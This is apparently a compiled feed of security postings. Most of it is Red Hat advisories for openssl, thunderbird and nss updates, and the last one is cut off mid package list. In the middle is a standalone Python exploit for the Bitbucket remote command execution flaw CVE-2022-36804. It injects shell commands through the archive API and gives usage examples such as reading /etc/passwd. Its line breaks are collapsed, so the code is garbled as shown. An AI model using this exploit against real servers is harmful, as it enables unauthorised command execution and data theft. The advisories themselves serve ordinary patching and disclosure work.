Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1441-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1441  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
openssl-1.1.1k-8.el8_6.src.rpm

aarch64:  
openssl-1.1.1k-8.el8_6.aarch64.rpm  
openssl-debuginfo-1.1.1k-8.el8_6.aarch64.rpm  
openssl-debugsource-1.1.1k-8.el8_6.aarch64.rpm  
openssl-devel-1.1.1k-8.el8_6.aarch64.rpm  
openssl-libs-1.1.1k-8.el8_6.aarch64.rpm  
openssl-libs-debuginfo-1.1.1k-8.el8_6.aarch64.rpm  
openssl-perl-1.1.1k-8.el8_6.aarch64.rpm

ppc64le:  
openssl-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-debuginfo-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-debugsource-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-devel-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-libs-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1k-8.el8_6.ppc64le.rpm  
openssl-perl-1.1.1k-8.el8_6.ppc64le.rpm

s390x:  
openssl-1.1.1k-8.el8_6.s390x.rpm  
openssl-debuginfo-1.1.1k-8.el8_6.s390x.rpm  
openssl-debugsource-1.1.1k-8.el8_6.s390x.rpm  
openssl-devel-1.1.1k-8.el8_6.s390x.rpm  
openssl-libs-1.1.1k-8.el8_6.s390x.rpm  
openssl-libs-debuginfo-1.1.1k-8.el8_6.s390x.rpm  
openssl-perl-1.1.1k-8.el8_6.s390x.rpm

x86_64:  
openssl-1.1.1k-8.el8_6.x86_64.rpm  
openssl-debuginfo-1.1.1k-8.el8_6.i686.rpm  
openssl-debuginfo-1.1.1k-8.el8_6.x86_64.rpm  
openssl-debugsource-1.1.1k-8.el8_6.i686.rpm  
openssl-debugsource-1.1.1k-8.el8_6.x86_64.rpm  
openssl-devel-1.1.1k-8.el8_6.i686.rpm  
openssl-devel-1.1.1k-8.el8_6.x86_64.rpm  
openssl-libs-1.1.1k-8.el8_6.i686.rpm  
openssl-libs-1.1.1k-8.el8_6.x86_64.rpm  
openssl-libs-debuginfo-1.1.1k-8.el8_6.i686.rpm  
openssl-libs-debuginfo-1.1.1k-8.el8_6.x86_64.rpm  
openssl-perl-1.1.1k-8.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7NzjgjWX9erEAQjEGRAAk+B4NZVXOw/6ESexdRQa3UoAJBzJ6KaY  
IUjQ45hsLjQQd6bYj79D4V6onHaCUZwxD5KPzAL8rz29gfUJbN5dAef4F1Zq+k3Y  
5dutPiVFLZ5C5wuX2cPgKp6GOsShlwWR/D3pjO67L+oeQEoYJ1K9nhqc5Pg/2dbJ  
5mPejApHZ5iw6V3XQq8s9hHmkRB+dF7jKzRFjttBk3Enec5Y93krT90L0oKkarcd  
Q6oNqtcQBnMK2994D9LdKri9uYBZ+PTpgchfGxsIaceeJwGaslNxyNAbsk5bywHC  
3F7ajsM/VkbpEPYqonjX4Ww+SjR4qnfBAhSJDn88GP29I0htmNlsk8zRpwbKpdxn  
J2CbdgHASLoKMa6+o3tpkSQgwgTjoL4Z9yQvCTW1O6Q+21lKEfwCIqoh70BzINy3  
fN13qgUocmC2H7DT/cM1yxG849qUt0QCN0Y6UmIZytzdfTPib5ZR0PK7z8NEPih8  
cFr2uIGKa2UvisJ8wtSQ3KiIWjy+cU7zbPJAh6QDch82wLPrBTy7koyB+9qbZ408  
Whff+suKBHWxNXLwjnS2N6U7uodZry0cCTlusoi8VrLLkg64LY4++VQZfofUmjqz  
WSFFcRGdZNbCi9XFWCJWZ+suiNiuRyKhzM7y8GlAyCdHb1uzk7g4fKIiUkd0tthT  
FS5/PuRmzNI=pQbM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1441-01

Red Hat Security Advisory 2023-1438-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1438-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1438  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 6  
Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 6 ELS) - i386, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 6 ELS) - i386, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux Server (v. 6 ELS):

Source:  
openssl-1.0.1e-61.el6_10.src.rpm

i386:  
openssl-1.0.1e-61.el6_10.i686.rpm  
openssl-debuginfo-1.0.1e-61.el6_10.i686.rpm  
openssl-devel-1.0.1e-61.el6_10.i686.rpm

s390x:  
openssl-1.0.1e-61.el6_10.s390.rpm  
openssl-1.0.1e-61.el6_10.s390x.rpm  
openssl-debuginfo-1.0.1e-61.el6_10.s390.rpm  
openssl-debuginfo-1.0.1e-61.el6_10.s390x.rpm  
openssl-devel-1.0.1e-61.el6_10.s390.rpm  
openssl-devel-1.0.1e-61.el6_10.s390x.rpm

x86_64:  
openssl-1.0.1e-61.el6_10.i686.rpm  
openssl-1.0.1e-61.el6_10.x86_64.rpm  
openssl-debuginfo-1.0.1e-61.el6_10.i686.rpm  
openssl-debuginfo-1.0.1e-61.el6_10.x86_64.rpm  
openssl-devel-1.0.1e-61.el6_10.i686.rpm  
openssl-devel-1.0.1e-61.el6_10.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6 ELS):

i386:  
openssl-debuginfo-1.0.1e-61.el6_10.i686.rpm  
openssl-perl-1.0.1e-61.el6_10.i686.rpm  
openssl-static-1.0.1e-61.el6_10.i686.rpm

s390x:  
openssl-debuginfo-1.0.1e-61.el6_10.s390x.rpm  
openssl-perl-1.0.1e-61.el6_10.s390x.rpm  
openssl-static-1.0.1e-61.el6_10.s390x.rpm

x86_64:  
openssl-debuginfo-1.0.1e-61.el6_10.x86_64.rpm  
openssl-perl-1.0.1e-61.el6_10.x86_64.rpm  
openssl-static-1.0.1e-61.el6_10.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7NzjgjWX9erEAQjEng/9H4eD9JfHPrMo7I2nNn5BmFSsAkVKGJmH  
S+UwS28apMed5VKlk+kZuBlJh3q6FhE2TlEU+bQ2FjJCFi77UWzlI4upEvjbq//1  
p+U+3/mW1safS9tGkWzQ412ZyEJFwmiO5LwBdzTg8MFwt1DnE3Dqhx+DD5DY19hN  
+v8tOPVDKG7WthUB0bnzI38GKAo6xCNwHXAH/22SRgBMbxMp6PY9NoiXpNt8YON3  
YFIW16qvTpjfWtKvalhmg97icKyxEh/hOXThHgaLT8m39NfiMrb0uNYMOsPuYos8  
/uXuQXSlGCfKSAf6wz1KMa94fg9p1GXuW2dLM+hgjENcIKGFiB6Wqp6LrrIezT1j  
0v4XRtcTp6Qhq2YR+053EI1VBZa7Uj0icWiN8o0efgOezX7LdyucRMa7jWkPac72  
ewpf59CSsUuvuh8+DJhZAr1bnK1LDiP9WwAmL6KC7pe+/hGGHuPNxmA3bB2pNRXu  
k9CAuxTtpEGqM8NpvvtnixNJ/vhvJ1r7jQErwVDLSBNlYEtEDxPk7TsDxdhlA2Tf  
o6aZi4yMFDdJSrktR96t+xthkgjkHicMn3wt+XSFzXAWNf0+nBR6Jm8PxD19eApB  
DDI0U0Alkd1mG9EehN/gDegTorACR+lJccdgc0O+j37rtMNuxGT9LpiwWJj5xn7i  
dKBbvGOB2ok=W1uu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1438-01

Red Hat Security Advisory 2023-1442-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.9.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:1442-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1442  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.9.0.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.9.0-2.el8_1.src.rpm

ppc64le:  
thunderbird-102.9.0-2.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.9.0-2.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.9.0-2.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.9.0-2.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_1.x86_64.rpm  
thunderbird-debugsource-102.9.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQiDhQ//WZN53iMM+vQklg2sgeqWFU4w9622Ndy2  
UiCyKDvrDPVaT09ZKpjvjVFVMitQ/D4M4P7HVvyduqA2rs/DMoAF5OcDHKJKzJpn  
AlOy4ti6dsnozKSmuzAl9UbZqiuvevnoangePNvnClxEvDX8svAxTrARIJ0AkC1F  
OmBpycj2C7B3MzSLcw1WtiL5rDkV06Za2oGB2h5Bj5u6Nw+frx6qZ2EBR6Lwhbfh  
qgZ78hj0bd/kaPLwZOmWaYfjA0Fl6xPdnWwlYQsefDmHJeyatO8fEuNTaNNFnBuf  
nZSnuCNRY0D+WUXChA2sRvc4+tJkeoBIL7XVBYocSOZDChpHBBk5uYTAavE9npYh  
t3T/ji28j0EN4F6SjUKA/BrCb4YMngDozHbhflbUNReKc/TN3O9BtD1Owy0gw3/N  
YRW93nrDaZ/FuaKm4o3rzJDXYaiYWWcm8aaQALqZq3jnTYaq7Mov9ARNEkOYSXKX  
ZnkkDJNIkUWsdxispXx/qacTR6jxePEeX3fC5/nYIuKr19mbxJpbErU4+3WrXwpt  
pmB/Vl2sybnvqr0wdM4LSTbfsnVfRn/+rqBUJC2n8wRPeTp2HzXF3Sv5cV+Fw8Oy  
0pFAHaOdU7eC1yMluHdw9a51wJH6U3G8L5SJp7uHPH9fSRpHocS+ncbQ1+eGMvRD  
WlWFLUh+aHo=5PlR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1442-01

Red Hat Security Advisory 2023-1443-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.9.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:1443-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1443  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.9.0.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.9.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.9.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.9.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.9.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.9.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQi/sg/+NLD4hWXVuxCNvUPRPIcFOvAxbUVPuy8+  
oCypHbape84h8IspAQQc3xy2phNnJCeZ+03kI4YuIn9sDsh17T3diDCQKq/Ltwwn  
pfKfCffM00QlNIv2yLgGz4m/lU08oF27VsQcV4hdTlNv1Hx4cp+h3xee2KBEzY4W  
pywMVZhGgKlaigIzyb6J/MhSDKBp6OLE4glgNkec4dRDjLtWK2BWxSNAOi07/ppX  
LxIrEvQlIjG0mh/6sOakXuuaXdVkpoScHPsGEhQxd8Ri1xrHPcO+udKuWahQzpkp  
Say6MDprb25u/hdNA387kkH4d6aaVS2iMZP6L2U0Z0c4dDDuBeC65fMeuPlRxMjJ  
/+hsCsUvJfFYUXm4ILrzoB9OyYwsvnGMeXd7dCJvcgN84m8bfJLx45hKiduIkmcd  
pSztKh6W2OippMaJaDdJTnvy5Pg5KysL+1J9mA5VEjaGfLGnFXghHbxrFTsfLqTJ  
X2avB3RxFX04Gp3cyTQlDP4hsEIUM+57zOQtIJqtJyVqbcGiVPSgUfOtaJZdjvvc  
IW5WHXkWzquFYSDTRB7CCAVPY5ZRCXvJ4W1ziRZPWmEYMYYSAZA8IIqFXoe2wUMD  
4eiXjCy4Y9ZuCnYoEnOSr0Yhv8ApB/tGvLoL2cHxvA6bimi0laZzYyrnGhGcxxnA  
Iuuhp2w3Qb0=I1JY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1443-01

Bitbucket version 7.0.0 suffers from a remote command execution vulnerability.

    # Exploit Title: Bitbucket v7.0.0 -  RCE# Date: 09-23-2022# Exploit Author: khal4n1# Vendor Homepage: https://github.com/khal4n1# Tested on: Kali and ubuntu LTS 22.04# CVE : cve-2022-36804#****************************************************************##The following exploit is used to exploit a vulnerability present#Atlassian Bitbucket Server and Data Center 7.0.0 before version#7.6.17, from version 7.7.0 before version 7.17.10, from version#7.18.0 before version 7.21.4, from version 8.0.0 before version#8.0.3, from version 8.1.0 before version 8.1.3, and from version#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1#Usage Example# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'#The server will send a 500 http response with the stout output from the# command  executed.#****************************************************************##!/usr/bin/python3import argparseimport urllibfrom urllib import requestimport re#argument setupparser = argparse.ArgumentParser(description='Program to testbitbucket vulnerability CVE-2022-36804')parser.add_argument("--url", help="Set the target to attack.[REQUIRED]", required=True )parser.add_argument("--cmd", help="Set the command to execute.[DEFAULT ID]", required=True, default='id')args = parser.parse_args()cmd= urllib.parse.quote(args.cmd)#reads from the public repository what is availablerequ = request.urlopen(args.url+ "/repos?visibility=public")response = requ.read()#select a public project and stores it in a variableproject = re.findall('7990/projects/(.*)/repos/',str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]#Selects a public repo and stores it in a vatiablefile = re.findall('/repos/(.*)/browse',str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]# Exploitationtry :        attack = request.urlopen(args.url +"/rest/api/latest/projects/" + project + "/repos/" + file +"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")        print (attack.response())except urllib.error.HTTPError as e:        body = e.read().decode()  # Read the body of the error response        print (body)

Bitbucket 7.0.0 Remote Command Execution

Red Hat Security Advisory 2023-1406-01 - Network Security Services is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: nss security update  
Advisory ID:       RHSA-2023:1406-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1406  
Issue date:        2023-03-22  
CVE Names:         CVE-2023-0767  
====================================================================  
1. Summary:

An update for nss is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Network Security Services (NSS) is a set of libraries designed to support  
the cross-platform development of security-enabled client and server  
applications.

Security Fix(es):

* nss: Arbitrary memory write via PKCS 12 (CVE-2023-0767)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, applications using NSS (for example, Firefox)  
must be restarted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170377 - CVE-2023-0767 nss: Arbitrary memory write via PKCS 12

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
nss-3.53.1-13.el8_2.src.rpm

aarch64:  
nss-3.53.1-13.el8_2.aarch64.rpm  
nss-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-debugsource-3.53.1-13.el8_2.aarch64.rpm  
nss-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-3.53.1-13.el8_2.aarch64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-devel-3.53.1-13.el8_2.aarch64.rpm

ppc64le:  
nss-3.53.1-13.el8_2.ppc64le.rpm  
nss-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-debugsource-3.53.1-13.el8_2.ppc64le.rpm  
nss-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-devel-3.53.1-13.el8_2.ppc64le.rpm

s390x:  
nss-3.53.1-13.el8_2.s390x.rpm  
nss-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-debugsource-3.53.1-13.el8_2.s390x.rpm  
nss-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.s390x.rpm  
